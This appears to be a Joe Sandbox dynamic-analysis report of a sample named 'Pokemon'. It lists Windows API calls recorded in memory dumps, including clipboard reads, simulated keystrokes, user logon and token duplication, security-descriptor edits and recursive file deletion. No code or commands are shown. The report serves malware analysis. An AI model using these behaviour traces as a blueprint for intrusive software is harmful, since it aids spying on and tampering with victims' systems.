• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0010F987
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000C5031
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00093963
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00093A76
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,000D0A84,?,?,00000000,?,000D0A84,00000000,0000000C), ref: 000D0737
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindFirstFileW.KERNEL32(?,?), ref: 000FDCCB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDD1B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 000FDD2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindClose.KERNEL32(00000000), ref: 000FDD43
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010666E
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000AFC86
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000EFCB8
                                                                                                                                                                                                                                                                                      • IsIconic.USER32(00000000), ref: 000EFCC1
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 000EFCCE
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFCD8
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EFCEE
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000EFCF5
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EFD01
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 000EFD12
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 000EFD1A
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000EFD22
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFD25
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD3A
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD45
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD4F
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD54
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD5D
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD62
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD6C
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD71
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFD74
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 000EFD9B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 000F1BD2
                                                                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000F1BF4
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F1C05
                                                                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000F1C1D
                                                                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 000F1C36
                                                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000F1C40
                                                                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000F1C5C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F1B48), ref: 000F1A20
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A0B: CloseHandle.KERNEL32(?,?,000F1B48), ref: 000F1A35
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                      • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F1518
                                                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F154C
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F1563
                                                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 000F159D
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F15B9
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F15D0
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F15D8
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000F15DF
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F1600
                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 000F1607
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F1636
                                                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F1658
                                                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F166A
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F1691
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F1698
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F16A1
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16A8
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F16B1
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16B8
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F16C4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F16CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: GetProcessHeap.KERNEL32(00000008,000F14FD,?,00000000,?,000F14FD,?), ref: 000F1AED
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F14FD,?), ref: 000F1AF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F14FD,?), ref: 000F1B03
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(0012DCD0), ref: 0010F586
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0010F594
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0010F5A0
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F5AC
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F5E4
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F5EE
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F619
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0010F626
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0010F62E
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F63F
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F67F
                                                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0010F695
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 0010F6A1
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0010F6B2
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0010F6D4
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010F6F1
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0010F72F
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0010F750
                                                                                                                                                                                                                                                                                      • CountClipboardFormats.USER32 ref: 0010F771
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0010F7B6
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00107403
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00107457
                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00107493
                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001074BA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 001074F7
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00107524
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                      • API String ID: 3830820486-3289030164
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0010A0A8
• GetFileAttributesW.KERNEL32(?), ref: 0010A0E6
• SetFileAttributesW.KERNEL32(?,?), ref: 0010A100
• FindNextFileW.KERNEL32(00000000,?), ref: 0010A118
• FindClose.KERNEL32(00000000), ref: 0010A123
• FindFirstFileW.KERNEL32(*.*,?), ref: 0010A13F
• SetCurrentDirectoryW.KERNEL32(?), ref: 0010A18F
• SetCurrentDirectoryW.KERNEL32(00157B94), ref: 0010A1AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0010A1B7
• FindClose.KERNEL32(00000000), ref: 0010A1C4
• FindClose.KERNEL32(00000000), ref: 0010A1D4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: b32db68b831cbef6664537b5799ab70c97c3e27a22e3bcedbfdbba1e14872262
• Instruction ID: 198bc752c94832380c7030c00bab6556ede723e36c9f7d73c1b5a16263d26a9e
• Opcode Fuzzy Hash: b32db68b831cbef6664537b5799ab70c97c3e27a22e3bcedbfdbba1e14872262
• Instruction Fuzzy Hash: 4631E47160071DBFDB20AFB4EC4AADE73ACAF04321F5001A5F855E20D0EBB0DE958A65
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00104785
• _wcslen.LIBCMT ref: 001047B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 001047E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00104803
• RemoveDirectoryW.KERNEL32(?), ref: 00104813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0010489A
• CloseHandle.KERNEL32(00000000), ref: 001048A5
• CloseHandle.KERNEL32(00000000), ref: 001048B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 8134300e774f5b4daa54316b6bd6c6df30a4c74e6147c3749b8d0858a63fab1d
• Instruction ID: 4306a9f6f7810783b337b807f32cab439a92fb5af545582e3f08dc6804c4ff82
